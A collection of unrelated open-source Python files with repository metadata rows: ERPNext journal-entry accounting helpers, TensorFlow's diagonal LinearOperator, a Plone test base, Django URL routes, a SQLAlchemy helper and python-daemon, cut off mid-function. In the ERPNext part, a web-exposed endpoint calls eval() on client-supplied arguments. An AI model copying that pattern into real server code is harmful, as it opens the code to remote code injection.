row2.credit_in_account_currency = amount
else:
row2.credit_in_account_currency = amount * exchange_rate
# set multi currency check
if row1.account_currency != po.company_currency or row2.account_currency != po.company_currency:
jv.multi_currency = 1
return jv.as_dict()
def get_payment_entry(doc):
bank_account = get_default_bank_cash_account(doc.company, "Bank Entry")
jv = frappe.new_doc('Journal Entry')
jv.voucher_type = 'Bank Entry'
jv.company = doc.company
jv.fiscal_year = doc.fiscal_year
jv.append("accounts")
d2 = jv.append("accounts")
if bank_account:
d2.account = bank_account["account"]
d2.balance = bank_account["balance"]
d2.account_currency = bank_account["account_currency"]
d2.account_type = bank_account["account_type"]
d2.exchange_rate = get_exchange_rate(bank_account["account"],
bank_account["account_currency"], doc.company)
return jv
@frappe.whitelist()
def get_opening_accounts(company):
"""get all balance sheet accounts for opening entry"""
accounts = frappe.db.sql_list("""select name from tabAccount
where is_group=0 and report_type='Balance Sheet' and company=%s""", company)
return [{"account": a, "balance": get_balance_on(a)} for a in accounts]
def get_against_jv(doctype, txt, searchfield, start, page_len, filters):
return frappe.db.sql("""select jv.name, jv.posting_date, jv.user_remark
from `tabJournal Entry` jv, `tabJournal Entry Account` jv_detail
where jv_detail.parent = jv.name and jv_detail.account = %s and ifnull(jv_detail.party, '') = %s
and ifnull(jv_detail.reference_type, '') = ''
and jv.docstatus = 1 and jv.{0} like %s order by jv.name desc limit %s, %s""".format(searchfield),
(filters.get("account"), cstr(filters.get("party")), "%{0}%".format(txt), start, page_len))
@frappe.whitelist()
def get_outstanding(args):
if not frappe.has_permission("Account"):
frappe.msgprint(_("No Permission"), raise_exception=1)
args = eval(args)
company_currency = get_company_currency(args.get("company"))
if args.get("doctype") == "Journal Entry":
condition = " and party=%(party)s" if args.get("party") else ""
against_jv_amount = frappe.db.sql("""
select sum(ifnull(debit_in_account_currency, 0)) - sum(ifnull(credit_in_account_currency, 0))
from `tabJournal Entry Account` where parent=%(docname)s and account=%(account)s {0}
and ifnull(reference_type, '')=''""".format(condition), args)
against_jv_amount = flt(against_jv_amount[0][0]) if against_jv_amount else 0
amount_field = "credit_in_account_currency" if against_jv_amount > 0 else "debit_in_account_currency"
return {
amount_field: abs(against_jv_amount)
}
elif args.get("doctype") in ("Sales Invoice", "Purchase Invoice"):
invoice = frappe.db.get_value(args["doctype"], args["docname"],
["outstanding_amount", "conversion_rate"], as_dict=1)
exchange_rate = invoice.conversion_rate if (args.get("account_currency") != company_currency) else 1
if args["doctype"] == "Sales Invoice":
amount_field = "credit_in_account_currency" \
if flt(invoice.outstanding_amount) > 0 else "debit_in_account_currency"
else:
amount_field = "debit_in_account_currency" \
if flt(invoice.outstanding_amount) > 0 else "credit_in_account_currency"
return {
amount_field: abs(flt(invoice.outstanding_amount)),
"exchange_rate": exchange_rate
}
@frappe.whitelist()
def get_party_account_and_balance(company, party_type, party):
if not frappe.has_permission("Account"):
frappe.msgprint(_("No Permission"), raise_exception=1)
from erpnext.accounts.party import get_party_account
account = get_party_account(party_type, party, company)
account_balance = get_balance_on(account=account)
party_balance = get_balance_on(party_type=party_type, party=party)
return {
"account": account,
"balance": account_balance,
"party_balance": party_balance
}
@frappe.whitelist()
def get_account_balance_and_party_type(account, date, company, debit=None, credit=None, exchange_rate=None):
"""Returns dict of account balance and party type to be set in Journal Entry on selection of account."""
if not frappe.has_permission("Account"):
frappe.msgprint(_("No Permission"), raise_exception=1)
company_currency = get_company_currency(company)
account_details = frappe.db.get_value("Account", account, ["account_type", "account_currency"], as_dict=1)
if account_details.account_type == "Receivable":
party_type = "Customer"
elif account_details.account_type == "Payable":
party_type = "Supplier"
else:
party_type = ""
grid_values = {
"balance": get_balance_on(account, date),
"party_type": party_type,
"account_type": account_details.account_type,
"account_currency": account_details.account_currency or company_currency,
"exchange_rate": get_exchange_rate(account, account_details.account_currency,
company, debit=debit, credit=credit, exchange_rate=exchange_rate)
}
return grid_values
@frappe.whitelist()
def get_exchange_rate(account, account_currency, company,
reference_type=None, reference_name=None, debit=None, credit=None, exchange_rate=None):
from erpnext.setup.utils import get_exchange_rate
company_currency = get_company_currency(company)
account_details = frappe.db.get_value("Account", account, ["account_type", "root_type"], as_dict=1)
if account_currency != company_currency:
if reference_type in ("Sales Invoice", "Purchase Invoice") and reference_name:
exchange_rate = frappe.db.get_value(reference_type, reference_name, "conversion_rate")
elif account_details and account_details.account_type == "Bank" and \
((account_details.root_type == "Asset" and flt(credit) > 0) or
(account_details.root_type == "Liability" and debit)):
exchange_rate = get_average_exchange_rate(account)
if not exchange_rate and account_currency:
exchange_rate = get_exchange_rate(account_currency, company_currency)
else:
exchange_rate = 1
# don't return None or 0 as it is multiplied with a value and that value could be lost
return exchange_rate or 1
def get_average_exchange_rate(account):
exchange_rate = 0
bank_balance_in_account_currency = get_balance_on(account)
if bank_balance_in_account_currency:
bank_balance_in_company_currency = get_balance_on(account, in_account_currency=False)
exchange_rate = bank_balance_in_company_currency / bank_balance_in_account_currency
return exchange_rate
|
mbauskar/alec_frappe5_erpnext
|
erpnext/accounts/doctype/journal_entry/journal_entry.py
|
Python
|
agpl-3.0
| 34,075
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""`LinearOperator` acting like a diagonal matrix."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops.linalg import linalg_impl as linalg
from tensorflow.python.ops.linalg import linear_operator
from tensorflow.python.ops.linalg import linear_operator_util
from tensorflow.python.util.tf_export import tf_export
__all__ = ["LinearOperatorDiag",]
@tf_export("linalg.LinearOperatorDiag")
class LinearOperatorDiag(linear_operator.LinearOperator):
"""`LinearOperator` acting like a [batch] square diagonal matrix.
This operator acts like a [batch] diagonal matrix `A` with shape
`[B1,...,Bb, N, N]` for some `b >= 0`. The first `b` indices index a
batch member. For every batch index `(i1,...,ib)`, `A[i1,...,ib, : :]` is
an `N x N` matrix. This matrix `A` is not materialized, but for
purposes of broadcasting this shape will be relevant.
`LinearOperatorDiag` is initialized with a (batch) vector.
```python
# Create a 2 x 2 diagonal linear operator.
diag = [1., -1.]
operator = LinearOperatorDiag(diag)
operator.to_dense()
==> [[1., 0.]
[0., -1.]]
operator.shape
==> [2, 2]
operator.log_abs_determinant()
==> scalar Tensor
x = ... Shape [2, 4] Tensor
operator.matmul(x)
==> Shape [2, 4] Tensor
# Create a [2, 3] batch of 4 x 4 linear operators.
diag = tf.random.normal(shape=[2, 3, 4])
operator = LinearOperatorDiag(diag)
# Create a shape [2, 1, 4, 2] vector. Note that this shape is compatible
# since the batch dimensions, [2, 1], are broadcast to
# operator.batch_shape = [2, 3].
y = tf.random.normal(shape=[2, 1, 4, 2])
x = operator.solve(y)
==> operator.matmul(x) = y
```
#### Shape compatibility
This operator acts on [batch] matrix with compatible shape.
`x` is a batch matrix with compatible shape for `matmul` and `solve` if
```
operator.shape = [B1,...,Bb] + [N, N], with b >= 0
x.shape = [C1,...,Cc] + [N, R],
and [C1,...,Cc] broadcasts with [B1,...,Bb] to [D1,...,Dd]
```
#### Performance
Suppose `operator` is a `LinearOperatorDiag` of shape `[N, N]`,
and `x.shape = [N, R]`. Then
* `operator.matmul(x)` involves `N * R` multiplications.
* `operator.solve(x)` involves `N` divisions and `N * R` multiplications.
* `operator.determinant()` involves a size `N` `reduce_prod`.
If instead `operator` and `x` have shape `[B1,...,Bb, N, N]` and
`[B1,...,Bb, N, R]`, every operation increases in complexity by `B1*...*Bb`.
#### Matrix property hints
This `LinearOperator` is initialized with boolean flags of the form `is_X`,
for `X = non_singular, self_adjoint, positive_definite, square`.
These have the following meaning:
* If `is_X == True`, callers should expect the operator to have the
property `X`. This is a promise that should be fulfilled, but is *not* a
runtime assert. For example, finite floating point precision may result
in these promises being violated.
* If `is_X == False`, callers should expect the operator to not have `X`.
* If `is_X == None` (the default), callers should have no expectation either
way.
"""
def __init__(self,
diag,
is_non_singular=None,
is_self_adjoint=None,
is_positive_definite=None,
is_square=None,
name="LinearOperatorDiag"):
r"""Initialize a `LinearOperatorDiag`.
Args:
diag: Shape `[B1,...,Bb, N]` `Tensor` with `b >= 0`, `N >= 0`.
The diagonal of the operator. Allowed dtypes: `float16`, `float32`,
`float64`, `complex64`, `complex128`.
is_non_singular: Expect that this operator is non-singular.
is_self_adjoint: Expect that this operator is equal to its hermitian
transpose. If `diag.dtype` is real, this is auto-set to `True`.
is_positive_definite: Expect that this operator is positive definite,
meaning the quadratic form `x^H A x` has positive real part for all
nonzero `x`. Note that we do not require the operator to be
self-adjoint to be positive-definite. See:
https://en.wikipedia.org/wiki/Positive-definite_matrix#Extension_for_non-symmetric_matrices
is_square: Expect that this operator acts like square [batch] matrices.
name: A name for this `LinearOperator`.
Raises:
TypeError: If `diag.dtype` is not an allowed type.
ValueError: If `diag.dtype` is real, and `is_self_adjoint` is not `True`.
"""
with ops.name_scope(name, values=[diag]):
self._diag = ops.convert_to_tensor(diag, name="diag")
self._check_diag(self._diag)
# Check and auto-set hints.
if not self._diag.dtype.is_complex:
if is_self_adjoint is False:
raise ValueError("A real diagonal operator is always self adjoint.")
else:
is_self_adjoint = True
if is_square is False:
raise ValueError("Only square diagonal operators currently supported.")
is_square = True
super(LinearOperatorDiag, self).__init__(
dtype=self._diag.dtype,
graph_parents=[self._diag],
is_non_singular=is_non_singular,
is_self_adjoint=is_self_adjoint,
is_positive_definite=is_positive_definite,
is_square=is_square,
name=name)
def _check_diag(self, diag):
"""Static check of diag."""
allowed_dtypes = [
dtypes.float16,
dtypes.float32,
dtypes.float64,
dtypes.complex64,
dtypes.complex128,
]
dtype = diag.dtype
if dtype not in allowed_dtypes:
raise TypeError(
"Argument diag must have dtype in %s. Found: %s"
% (allowed_dtypes, dtype))
if diag.get_shape().ndims is not None and diag.get_shape().ndims < 1:
raise ValueError("Argument diag must have at least 1 dimension. "
"Found: %s" % diag)
def _shape(self):
# If d_shape = [5, 3], we return [5, 3, 3].
d_shape = self._diag.get_shape()
return d_shape.concatenate(d_shape[-1:])
def _shape_tensor(self):
d_shape = array_ops.shape(self._diag)
k = d_shape[-1]
return array_ops.concat((d_shape, [k]), 0)
def _assert_non_singular(self):
return linear_operator_util.assert_no_entries_with_modulus_zero(
self._diag,
message="Singular operator: Diagonal contained zero values.")
def _assert_positive_definite(self):
if self.dtype.is_complex:
message = (
"Diagonal operator had diagonal entries with non-positive real part, "
"thus was not positive definite.")
else:
message = (
"Real diagonal operator had non-positive diagonal entries, "
"thus was not positive definite.")
return check_ops.assert_positive(
math_ops.real(self._diag),
message=message)
def _assert_self_adjoint(self):
return linear_operator_util.assert_zero_imag_part(
self._diag,
message=(
"This diagonal operator contained non-zero imaginary values. "
" Thus it was not self-adjoint."))
def _matmul(self, x, adjoint=False, adjoint_arg=False):
diag_term = math_ops.conj(self._diag) if adjoint else self._diag
x = linalg.adjoint(x) if adjoint_arg else x
diag_mat = array_ops.expand_dims(diag_term, -1)
return diag_mat * x
def _matvec(self, x, adjoint=False):
diag_term = math_ops.conj(self._diag) if adjoint else self._diag
return diag_term * x
def _determinant(self):
return math_ops.reduce_prod(self._diag, axis=[-1])
def _log_abs_determinant(self):
log_det = math_ops.reduce_sum(
math_ops.log(math_ops.abs(self._diag)), axis=[-1])
if self.dtype.is_complex:
log_det = math_ops.cast(log_det, dtype=self.dtype)
return log_det
def _solve(self, rhs, adjoint=False, adjoint_arg=False):
diag_term = math_ops.conj(self._diag) if adjoint else self._diag
rhs = linalg.adjoint(rhs) if adjoint_arg else rhs
inv_diag_mat = array_ops.expand_dims(1. / diag_term, -1)
return rhs * inv_diag_mat
def _to_dense(self):
return array_ops.matrix_diag(self._diag)
def _diag_part(self):
return self.diag
def _add_to_tensor(self, x):
x_diag = array_ops.matrix_diag_part(x)
new_diag = self._diag + x_diag
return array_ops.matrix_set_diag(x, new_diag)
@property
def diag(self):
return self._diag
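# Illustrative usage sketch (added commentary, not part of the library module):
# it exercises the property hints and the matmul/solve costs described in the
# class docstring above. The shapes and the `tf` alias are assumptions made
# purely for illustration.
#
#   import tensorflow as tf
#   diag = tf.constant([2., 3.])
#   operator = tf.linalg.LinearOperatorDiag(
#       diag, is_non_singular=True, is_positive_definite=True)
#   x = tf.ones([2, 4])
#   y = operator.matmul(x)      # N * R multiplications (elementwise row scaling)
#   x_back = operator.solve(y)  # N divisions and N * R multiplications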
|
ghchinoy/tensorflow
|
tensorflow/python/ops/linalg/linear_operator_diag.py
|
Python
|
apache-2.0
| 9,369
|
import unittest2 as unittest
from Products.CMFCore.utils import getToolByName
from Products.PythonScripts.PythonScript import PythonScript
from collective.portlet.pythonscript.content.interface import IPythonScriptManager
from collective.viewlet.pythonscript.testing import COLLECTIVE_VIEWLET_PYTHONSCRIPT_INTEGRATION
class TestBase(unittest.TestCase):
"""Base test case."""
layer = COLLECTIVE_VIEWLET_PYTHONSCRIPT_INTEGRATION
def setUp(self):
"""Setup fixture."""
self.app = self.layer['app']
self.portal = self.layer['portal']
self.qi_tool = getToolByName(self.portal, 'portal_quickinstaller')
self.ploneSite = self.app.plone
def createPythonScript(self, id_, title, code):
"""Creare new Python Script object."""
ps = PythonScript(id_)
if title:
ps.ZPythonScript_setTitle(title)
ps.write(code)
ps._makeFunction()
return ps
def addPythonScript(self, id_, title, code, container=None):
"""Add new Python Script to Plone Site."""
ps = self.createPythonScript(id_, title, code)
if container is None:
container = self.ploneSite
container[id_] = ps
return ps
def getScriptManager(self):
"""Return script manager for Plone site."""
return IPythonScriptManager(self.ploneSite)
|
radekj/collective.viewlet.pythonscript
|
src/collective/viewlet/pythonscript/tests/base.py
|
Python
|
gpl-2.0
| 1,371
|
from django.conf.urls import include, url
from django.contrib import admin
from products.views import (
ProductCreateView,
ProductUpdateView,
SellerProductListView
)
from .views import (
SellerDashboard,
SellerProductDetailRedirectView,
SellerTransactionListView,
)
urlpatterns = [
url(r'^$', SellerDashboard.as_view(), name='dashboard'),
url(r'^transactions/$', SellerTransactionListView.as_view(), name='transactions'),
url(r'^products/$', SellerProductListView.as_view(), name='product_list'), #sellers:product_list
url(r'^products/(?P<pk>\d+)/$', SellerProductDetailRedirectView.as_view()),
url(r'^products/(?P<pk>\d+)/edit/$', ProductUpdateView.as_view(), name='product_edit'),
url(r'^products/add/$', ProductCreateView.as_view(), name='product_create'),
]
|
codingforentrepreneurs/digital-marketplace
|
src/sellers/urls.py
|
Python
|
mit
| 833
|
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker, scoped_session
from sqlalchemy.sql import ClauseElement
DB_URI = 'sqlite:///stuff.db'
db_engine = create_engine(DB_URI)
session = scoped_session(
sessionmaker(
autocommit=False,
autoflush=False,
bind=db_engine
)
)
Model = declarative_base()
def get_or_create(session, model, defaults=None, **kwargs):
instance = session.query(model).filter_by(**kwargs).first()
if instance:
return instance, False
else:
params = dict((k, v) for k, v in kwargs.items() if not isinstance(v, ClauseElement))
params.update(defaults or {})
instance = model(**params)
session.add(instance)
session.commit()
return instance, True
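# Minimal usage sketch (added for illustration only): `Page` below is a
# hypothetical declarative model, not something defined in this module.
#
#   from sqlalchemy import Column, Integer, String
#
#   class Page(Model):
#       __tablename__ = 'pages'
#       id = Column(Integer, primary_key=True)
#       url = Column(String, unique=True)
#
#   Model.metadata.create_all(db_engine)
#   page, created = get_or_create(session, Page, url='https://example.com/')
#   # `created` is True on the first call and False on subsequent calls.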
|
Haikson/sitemap-generator
|
pysitemap/db.py
|
Python
|
apache-2.0
| 852
|
# -*- coding: utf-8 -*-
from __future__ import print_function
# daemon/daemon.py
# Part of python-daemon, an implementation of PEP 3143.
#
# Copyright © 2008–2010 Ben Finney <ben+python@benfinney.id.au>
# Copyright © 2007–2008 Robert Niederreiter, Jens Klein
# Copyright © 2004–2005 Chad J. Schroeder
# Copyright © 2003 Clark Evans
# Copyright © 2002 Noah Spurrier
# Copyright © 2001 Jürgen Hermann
#
# This is free software: you may copy, modify, and/or distribute this work
# under the terms of the Python Software Foundation License, version 2 or
# later as published by the Python Software Foundation.
# No warranty expressed or implied. See the file LICENSE.PSF-2 for details.
""" Daemon process behaviour.
"""
import os
import sys
import resource
import errno
import signal
import socket
import atexit
class DaemonError(Exception):
""" Base exception class for errors from this module. """
class DaemonOSEnvironmentError(DaemonError, OSError):
""" Exception raised when daemon OS environment setup receives error. """
class DaemonProcessDetachError(DaemonError, OSError):
""" Exception raised when process detach fails. """
class DaemonContext(object):
""" Context for turning the current program into a daemon process.
A `DaemonContext` instance represents the behaviour settings and
process context for the program when it becomes a daemon. The
behaviour and environment is customised by setting options on the
instance, before calling the `open` method.
Each option can be passed as a keyword argument to the `DaemonContext`
constructor, or subsequently altered by assigning to an attribute on
the instance at any time prior to calling `open`. That is, for
options named `wibble` and `wubble`, the following invocation::
foo = daemon.DaemonContext(wibble=bar, wubble=baz)
foo.open()
is equivalent to::
foo = daemon.DaemonContext()
foo.wibble = bar
foo.wubble = baz
foo.open()
The following options are defined.
`files_preserve`
:Default: ``None``
List of files that should *not* be closed when starting the
daemon. If ``None``, all open file descriptors will be closed.
Elements of the list are file descriptors (as returned by a file
object's `fileno()` method) or Python `file` objects. Each
specifies a file that is not to be closed during daemon start.
`chroot_directory`
:Default: ``None``
Full path to a directory to set as the effective root directory of
the process. If ``None``, specifies that the root directory is not
to be changed.
`working_directory`
:Default: ``'/'``
Full path of the working directory to which the process should
change on daemon start.
Since a filesystem cannot be unmounted if a process has its
current working directory on that filesystem, this should either
be left at default or set to a directory that is a sensible “home
directory” for the daemon while it is running.
`umask`
:Default: ``0``
File access creation mask (“umask”) to set for the process on
daemon start.
Since a process inherits its umask from its parent process,
starting the daemon will reset the umask to this value so that
files are created by the daemon with access modes as it expects.
`pidfile`
:Default: ``None``
Context manager for a PID lock file. When the daemon context opens
and closes, it enters and exits the `pidfile` context manager.
`detach_process`
:Default: ``None``
If ``True``, detach the process context when opening the daemon
context; if ``False``, do not detach.
If unspecified (``None``) during initialisation of the instance,
this will be set to ``True`` by default, and ``False`` only if
detaching the process is determined to be redundant; for example,
in the case when the process was started by `init`, by `initd`, or
by `inetd`.
`signal_map`
:Default: system-dependent
Mapping from operating system signals to callback actions.
The mapping is used when the daemon context opens, and determines
the action for each signal's signal handler:
* A value of ``None`` will ignore the signal (by setting the
signal action to ``signal.SIG_IGN``).
* A string value will be used as the name of an attribute on the
``DaemonContext`` instance. The attribute's value will be used
as the action for the signal handler.
* Any other value will be used as the action for the
signal handler. See the ``signal.signal`` documentation
for details of the signal handler interface.
The default value depends on which signals are defined on the
running system. Each item from the list below whose signal is
actually defined in the ``signal`` module will appear in the
default map:
* ``signal.SIGTTIN``: ``None``
* ``signal.SIGTTOU``: ``None``
* ``signal.SIGTSTP``: ``None``
* ``signal.SIGTERM``: ``'terminate'``
Depending on how the program will interact with its child
processes, it may need to specify a signal map that
includes the ``signal.SIGCHLD`` signal (received when a
child process exits). See the specific operating system's
documentation for more detail on how to determine what
circumstances dictate the need for signal handlers.
`uid`
:Default: ``os.getuid()``
`gid`
:Default: ``os.getgid()``
The user ID (“UID”) value and group ID (“GID”) value to switch
the process to on daemon start.
The default values, the real UID and GID of the process, will
relinquish any effective privilege elevation inherited by the
process.
`prevent_core`
:Default: ``True``
If true, prevents the generation of core files, in order to avoid
leaking sensitive information from daemons run as `root`.
`stdin`
:Default: ``None``
`stdout`
:Default: ``None``
`stderr`
:Default: ``None``
Each of `stdin`, `stdout`, and `stderr` is a file-like object
which will be used as the new file for the standard I/O stream
`sys.stdin`, `sys.stdout`, and `sys.stderr` respectively. The file
should therefore be open, with a minimum of mode 'r' in the case
of `stdin`, and mode 'w+' in the case of `stdout` and `stderr`.
If the object has a `fileno()` method that returns a file
descriptor, the corresponding file will be excluded from being
closed during daemon start (that is, it will be treated as though
it were listed in `files_preserve`).
If ``None``, the corresponding system stream is re-bound to the
file named by `os.devnull`.
"""
def __init__(
self,
chroot_directory=None,
working_directory='/',
umask=0,
uid=None,
gid=None,
prevent_core=True,
detach_process=None,
files_preserve=None,
pidfile=None,
stdin=None,
stdout=None,
stderr=None,
signal_map=None):
""" Set up a new instance. """
self.chroot_directory = chroot_directory
self.working_directory = working_directory
self.umask = umask
self.prevent_core = prevent_core
self.files_preserve = files_preserve
self.pidfile = pidfile
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
if uid is None:
uid = os.getuid()
self.uid = uid
if gid is None:
gid = os.getgid()
self.gid = gid
if detach_process is None:
detach_process = is_detach_process_context_required()
self.detach_process = detach_process
if signal_map is None:
signal_map = make_default_signal_map()
self.signal_map = signal_map
self._is_open = False
@property
def is_open(self):
""" ``True`` if the instance is currently open. """
return self._is_open
def open(self):
""" Become a daemon process.
:Return: ``None``
Open the daemon context, turning the current program into a daemon
process. This performs the following steps:
* If this instance's `is_open` property is true, return
immediately. This makes it safe to call `open` multiple times on
an instance.
* If the `prevent_core` attribute is true, set the resource limits
for the process to prevent any core dump from the process.
* If the `chroot_directory` attribute is not ``None``, set the
effective root directory of the process to that directory (via
`os.chroot`).
This allows running the daemon process inside a “chroot gaol”
as a means of limiting the system's exposure to rogue behaviour
by the process. Note that the specified directory needs to
already be set up for this purpose.
* Set the process UID and GID to the `uid` and `gid` attribute
values.
* Close all open file descriptors. This excludes those listed in
the `files_preserve` attribute, and those that correspond to the
`stdin`, `stdout`, or `stderr` attributes.
* Change current working directory to the path specified by the
`working_directory` attribute.
* Reset the file access creation mask to the value specified by
the `umask` attribute.
* If the `detach_process` option is true, detach the current
process into its own process group, and disassociate from any
controlling terminal.
* Set signal handlers as specified by the `signal_map` attribute.
* If any of the attributes `stdin`, `stdout`, `stderr` are not
``None``, bind the system streams `sys.stdin`, `sys.stdout`,
and/or `sys.stderr` to the files represented by the
corresponding attributes. Where the attribute has a file
descriptor, the descriptor is duplicated (instead of re-binding
the name).
* If the `pidfile` attribute is not ``None``, enter its context
manager.
* Mark this instance as open (for the purpose of future `open` and
`close` calls).
* Register the `close` method to be called during Python's exit
processing.
When the function returns, the running program is a daemon
process.
"""
if self.is_open:
return
if self.chroot_directory is not None:
change_root_directory(self.chroot_directory)
if self.prevent_core:
prevent_core_dump()
change_file_creation_mask(self.umask)
change_working_directory(self.working_directory)
change_process_owner(self.uid, self.gid)
if self.detach_process:
detach_process_context()
signal_handler_map = self._make_signal_handler_map()
set_signal_handlers(signal_handler_map)
exclude_fds = self._get_exclude_file_descriptors()
close_all_open_files(exclude=exclude_fds)
redirect_stream(sys.stdin, self.stdin)
redirect_stream(sys.stdout, self.stdout)
redirect_stream(sys.stderr, self.stderr)
if self.pidfile is not None:
self.pidfile.__enter__()
self._is_open = True
register_atexit_function(self.close)
def __enter__(self):
""" Context manager entry point. """
self.open()
return self
def close(self):
""" Exit the daemon process context.
:Return: ``None``
Close the daemon context. This performs the following steps:
* If this instance's `is_open` property is false, return
immediately. This makes it safe to call `close` multiple times
on an instance.
* If the `pidfile` attribute is not ``None``, exit its context
manager.
* Mark this instance as closed (for the purpose of future `open`
and `close` calls).
"""
if not self.is_open:
return
if self.pidfile is not None:
# Follow the interface for telling a context manager to exit,
# <URL:http://docs.python.org/library/stdtypes.html#typecontextmanager>.
self.pidfile.__exit__(None, None, None)
self._is_open = False
def __exit__(self, exc_type, exc_value, traceback):
""" Context manager exit point. """
self.close()
def terminate(self, signal_number, stack_frame):
""" Signal handler for end-process signals.
:Return: ``None``
Signal handler for the ``signal.SIGTERM`` signal. Performs the
following step:
* Raise a ``SystemExit`` exception explaining the signal.
"""
exception = SystemExit(
"Terminating on signal %(signal_number)r" % vars())
raise exception
def _get_exclude_file_descriptors(self):
""" Return the set of file descriptors to exclude closing.
Returns a set containing the file descriptors for the
items in `files_preserve`, and also each of `stdin`,
`stdout`, and `stderr`:
* If the item is ``None``, it is omitted from the return
set.
* If the item has a ``fileno()`` method, that method's
return value is in the return set.
* Otherwise, the item is in the return set verbatim.
"""
files_preserve = self.files_preserve
if files_preserve is None:
files_preserve = []
files_preserve.extend(
item for item in [self.stdin, self.stdout, self.stderr]
if hasattr(item, 'fileno'))
exclude_descriptors = set()
for item in files_preserve:
if item is None:
continue
if hasattr(item, 'fileno'):
exclude_descriptors.add(item.fileno())
else:
exclude_descriptors.add(item)
return exclude_descriptors
def _make_signal_handler(self, target):
""" Make the signal handler for a specified target object.
If `target` is ``None``, returns ``signal.SIG_IGN``. If
`target` is a string, returns the attribute of this
instance named by that string. Otherwise, returns `target`
itself.
"""
if target is None:
result = signal.SIG_IGN
elif isinstance(target, str):
name = target
result = getattr(self, name)
else:
result = target
return result
def _make_signal_handler_map(self):
""" Make the map from signals to handlers for this instance.
Constructs a map from signal numbers to handlers for this
context instance, suitable for passing to
`set_signal_handlers`.
"""
signal_handler_map = dict(
(signal_number, self._make_signal_handler(target))
for (signal_number, target) in self.signal_map.items())
return signal_handler_map
def change_working_directory(directory):
""" Change the working directory of this process.
"""
try:
os.chdir(directory)
except Exception as exc:
error = DaemonOSEnvironmentError(
"Unable to change working directory (%s)" % exc)
raise error
def change_root_directory(directory):
""" Change the root directory of this process.
Sets the current working directory, then the process root
directory, to the specified `directory`. Requires appropriate
OS privileges for this process.
"""
try:
os.chdir(directory)
os.chroot(directory)
except Exception as exc:
error = DaemonOSEnvironmentError(
"Unable to change root directory (%s)" % exc)
raise error
def change_file_creation_mask(mask):
""" Change the file creation mask for this process.
"""
try:
os.umask(mask)
except Exception as exc:
error = DaemonOSEnvironmentError(
"Unable to change file creation mask (%s)" % exc)
raise error
def change_process_owner(uid, gid):
""" Change the owning UID and GID of this process.
Sets the GID then the UID of the process (in that order, to
avoid permission errors) to the specified `gid` and `uid`
values. Requires appropriate OS privileges for this process.
"""
try:
os.setgid(gid)
os.setuid(uid)
except Exception as exc:
error = DaemonOSEnvironmentError(
"Unable to change file creation mask (%s)" % exc)
raise error
def prevent_core_dump():
""" Prevent this process from generating a core dump.
Sets the soft and hard limits for core dump size to zero. On
Unix, this prevents the process from creating core dump
altogether.
"""
core_resource = resource.RLIMIT_CORE
try:
# Ensure the resource limit exists on this platform, by requesting
# its current value
resource.getrlimit(core_resource)
except ValueError as exc:
error = DaemonOSEnvironmentError(
"System does not support RLIMIT_CORE resource limit (%s)" % exc)
raise error
# Set hard and soft limits to zero, i.e. no core dump at all
core_limit = (0, 0)
resource.setrlimit(core_resource, core_limit)
def detach_process_context():
""" Detach the process context from parent and session.
Detach from the parent process and session group, allowing the
parent to exit while this process continues running.
Reference: “Advanced Programming in the Unix Environment”,
section 13.3, by W. Richard Stevens, published 1993 by
Addison-Wesley.
"""
def fork_then_exit_parent(error_message):
""" Fork a child process, then exit the parent process.
If the fork fails, raise a ``DaemonProcessDetachError``
with ``error_message``.
"""
try:
pid = os.fork()
if pid > 0:
# pylint: disable=W0212
os._exit(0)
except OSError as exc:
error = DaemonProcessDetachError(
"%(error_message)s: [%(exc_errno)d] %(exc_strerror)s" % {
'error_message': error_message,
'exc_errno': exc.errno,
'exc_strerror': exc.strerror})
raise error
fork_then_exit_parent(error_message="Failed first fork")
os.setsid()
fork_then_exit_parent(error_message="Failed second fork")
def is_process_started_by_init():
""" Determine if the current process is started by `init`.
The `init` process has the process ID of 1; if that is our
parent process ID, return ``True``, otherwise ``False``.
"""
result = False
init_pid = 1
if os.getppid() == init_pid:
result = True
return result
def is_socket(fd):
""" Determine if the file descriptor is a socket.
Return ``False`` if querying the socket type of `fd` raises an
error; otherwise return ``True``.
"""
result = False
file_socket = socket.fromfd(fd, socket.AF_INET, socket.SOCK_RAW)
try:
file_socket.getsockopt(
socket.SOL_SOCKET, socket.SO_TYPE)
except socket.error as exc:
exc_errno = exc.args[0]
if exc_errno == errno.ENOTSOCK:
# Socket operation on non-socket
pass
else:
# Some other socket error
result = True
else:
# No error getting socket type
result = True
return result
def is_process_started_by_superserver():
""" Determine if the current process is started by the superserver.
The internet superserver creates a network socket, and
attaches it to the standard streams of the child process. If
that is the case for this process, return ``True``, otherwise
``False``.
"""
result = False
stdin_fd = sys.__stdin__.fileno()
if is_socket(stdin_fd):
result = True
return result
def is_detach_process_context_required():
""" Determine whether detaching process context is required.
Return ``True`` if the process environment indicates the
process is already detached:
* Process was started by `init`; or
* Process was started by `inetd`.
"""
result = True
if is_process_started_by_init() or is_process_started_by_superserver():
result = False
return result
def close_file_descriptor_if_open(fd):
""" Close a file descriptor if already open.
Close the file descriptor `fd`, suppressing an error in the
case the file was not open.
"""
try:
os.close(fd)
except OSError as exc:
if exc.errno == errno.EBADF:
# File descriptor was not open
pass
else:
error = DaemonOSEnvironmentError(
"Failed to close file descriptor %(fd)d"
" (%(exc)s)" % {'fd': fd, 'exc': exc})
raise error
MAXFD = 2048
def get_maximum_file_descriptors():
""" Return the maximum number of open file descriptors for this process.
Return the process hard resource limit of maximum number of
open file descriptors. If the limit is “infinity”, a default
value of ``MAXFD`` is returned.
"""
limits = resource.getrlimit(resource.RLIMIT_NOFILE)
result = limits[1]
if result == resource.RLIM_INFINITY:
result = MAXFD
return result
def close_all_open_files(exclude=None):
""" Close all open file descriptors.
Closes every file descriptor (if open) of this process. If
specified, `exclude` is a set of file descriptors to *not*
close.
"""
if exclude is None:
exclude = set()
maxfd = get_maximum_file_descriptors()
